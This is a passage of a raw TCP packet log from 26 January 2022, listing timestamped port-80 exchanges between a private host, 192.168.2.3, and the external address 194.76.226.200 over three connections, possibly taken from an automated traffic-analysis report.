              Jan 26, 2022 10:28:11.214036942 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.214056969 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.214072943 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.214083910 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.214109898 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.214133978 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.214447021 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.214471102 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.214488029 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.214499950 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.214519024 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.214543104 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.221071005 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.221100092 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.221116066 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.221127987 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.221177101 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.221209049 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.221496105 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.221518993 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.221534967 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.221545935 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.221551895 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.221570969 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.221827030 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.221863985 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.221889973 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.221903086 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.222024918 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.222034931 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.222332001 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.222353935 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.222371101 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.222388029 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.222404003 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.222419977 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.222431898 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.222440004 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.222489119 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.229440928 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.229470015 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.229486942 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.229499102 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.229533911 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.229561090 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.231194019 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.231513977 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.231570959 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.231625080 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.231730938 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.231981993 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.232002020 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.232017994 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.232034922 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.232048988 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.232052088 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.232069016 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.232080936 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.232095957 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.232112885 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.232112885 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.232130051 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.232140064 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.232151031 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.232173920 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.237093925 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.237124920 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.237142086 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.237154961 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.237168074 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.237199068 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.239063025 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239093065 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239109993 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239130974 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239145994 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239162922 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239168882 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.239175081 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239192009 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239193916 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.239248991 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239249945 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.239264965 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239281893 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239301920 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239312887 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.239322901 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239335060 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239340067 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.239351034 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239372015 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.239379883 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239396095 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239404917 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.239407063 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.239434958 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.247284889 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.247317076 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.247335911 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.247353077 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.247370005 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.247385025 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.247400045 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.247431040 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.247490883 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.247562885 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.247582912 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.247637033 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.247648954 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.247663975 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.247713089 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.247848034 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.247930050 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.248028040 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.248043060 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.248087883 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.248106956 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.248553038 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.248573065 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.248635054 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.248648882 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.248662949 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.248733997 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.253375053 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.253412962 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.253436089 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.253460884 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.253489971 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.253520966 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.254560947 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.254669905 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.254693031 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.254708052 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.254724979 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.254754066 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.255042076 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.255170107 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.255192041 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.255208015 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.255222082 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.255255938 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.255449057 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.255582094 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.255604029 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.255620003 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.255635023 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.255659103 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.257406950 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.257438898 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.257463932 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.257483959 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.257504940 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.257524967 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.257538080 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.257543087 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.257561922 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.257575989 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.260900974 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.260935068 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.260976076 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.260977983 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.260994911 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.261040926 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.262583971 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.262645006 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.262650013 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.262669086 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.262686014 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.262725115 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.263133049 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.263206959 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.263230085 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.263245106 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.263278008 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.263539076 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.263562918 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.263600111 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.263605118 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.263622046 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.263664961 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.264334917 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.264421940 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.264444113 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.264462948 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.264473915 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.264518976 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.361092091 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.361172915 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.361191988 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.361205101 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.361222982 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.361238956 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.361251116 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.361253023 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.361285925 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.361344099 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.361363888 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.361380100 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.361392021 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.361407995 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.361443996 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.370084047 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.370115042 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.370131969 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.370148897 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.370165110 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.370181084 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.370194912 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.370223045 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.370424032 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.370460987 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.370590925 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.370609045 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.370620966 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.370645046 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.370670080 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.370840073 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.370858908 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.370870113 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.370913029 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.381561041 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.381592035 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.381604910 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.381618977 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.381634951 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.381645918 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.381659985 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.381660938 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.381678104 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.381690025 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.381689072 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.381706953 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.381714106 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.381725073 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.381736994 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.381763935 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.382091999 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.382112026 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.382122040 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.382158041 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.382252932 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385256052 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385286093 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385298014 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385313988 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385332108 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385344028 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385359049 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385368109 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.385396004 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385409117 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.385410070 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385423899 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385462046 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.385485888 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385504007 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385514975 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385544062 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.385587931 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385601044 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.385644913 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.390129089 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.390156984 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.390172958 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.390185118 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.390214920 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.390244007 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.392385960 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.484787941 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.484800100 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.484828949 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.484868050 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.485887051 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.485930920 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.485948086 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.485959053 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.485992908 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.486032963 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.486771107 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.486790895 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.486824036 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.486836910 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.486857891 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.486901045 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.491110086 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.491137028 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.491152048 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.491172075 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.491261005 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.491410017 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.491441011 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.491473913 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.491486073 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.491503000 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.491528034 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.494498014 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.494522095 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.494538069 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.494549990 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.494581938 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.494607925 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.494985104 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.495006084 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.495023966 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.495039940 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.495052099 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.495054960 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.495073080 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.495078087 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.495110035 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.495157003 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.499556065 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.499589920 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.499602079 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.499615908 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.499686003 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.499723911 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.500472069 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.500497103 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.500528097 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.500540018 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.500550032 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.500581026 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.502403021 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.502429962 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.502444983 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.502455950 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.502501011 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.502518892 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.503002882 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.503022909 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.503040075 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.503052950 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.503058910 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.503079891 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.503174067 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.503207922 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.503217936 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.503223896 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.503232956 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.503268957 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.508189917 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.508224010 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.508235931 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.508275986 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.508304119 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.508328915 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.508451939 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.508470058 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.508486032 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.508496046 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.508497953 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.508517981 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.509716034 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.509741068 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.509757042 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.509767056 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.509794950 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.509819031 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:11.511945963 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.511974096 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.511990070 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.512002945 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:11.512017965 CET8049754194.76.226.200192.168.2.3
